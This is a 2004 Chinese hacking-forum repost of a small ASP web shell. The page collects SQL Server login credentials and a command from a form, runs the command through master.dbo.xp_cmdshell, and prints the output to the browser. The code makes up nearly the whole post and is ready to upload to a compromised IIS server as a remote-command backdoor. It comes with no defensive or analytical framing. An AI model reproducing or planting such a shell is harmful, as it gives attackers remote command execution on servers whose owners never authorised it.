‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]一个asp 的sqlcmd

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6828 
精华
834 
积分
36067 
阅读权限
255 
性别
男 
来自
中国 
在线时间
597 小时 
注册时间
2004-6-25 
最后登录
2008-11-18 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-7-23 10:43  只看该作者

[转载]一个asp 的sqlcmd

信息来源:SuperHei

<% If trim(request.form("cmd"))<>"" Then %>
<%
password= trim(Request.form("pa"))
id=trim(Request.form("id"))
set adoConn=Server.CreateObject("ADODB.Connection")
adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id
strQuery = "exec master.dbo.xp_cmdshell &#39;" & request.form("cmd") & "&#39;"
set recResult = adoConn.Execute(strQuery)
If NOT recResult.EOF Then
Do While NOT recResult.EOF
strResult = strResult & chr(13) & recResult(0)
recResult.MoveNext
Loop
End if
set recResult = Nothing
strResult = Replace(strResult," "," ")
strResult = Replace(strResult,"<","<")
strResult = Replace(strResult,">",">")
strResult = Replace(strResult,chr(13),"<br>")
response.write strResult
End if
set adoConn = Nothing
%> <br><table border=0 width=500 cellspacing=0 cellpadding=0 bgcolor="#B8B8B8" class="noborder">
<tr bgcolor="#EEEEEE" height=18 class="noborder">
<form name="form" method=post action="<%=Request.ServerVariables("URL")%>">
<input type="text" name="cmd" size=25 >
<input type="text" name="id" size=10 value=<%=id%>>
<input type="text" name="pa" size=10 value=<%=password%>>
<input type="submit" value="执行cmd命令">
</form>
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题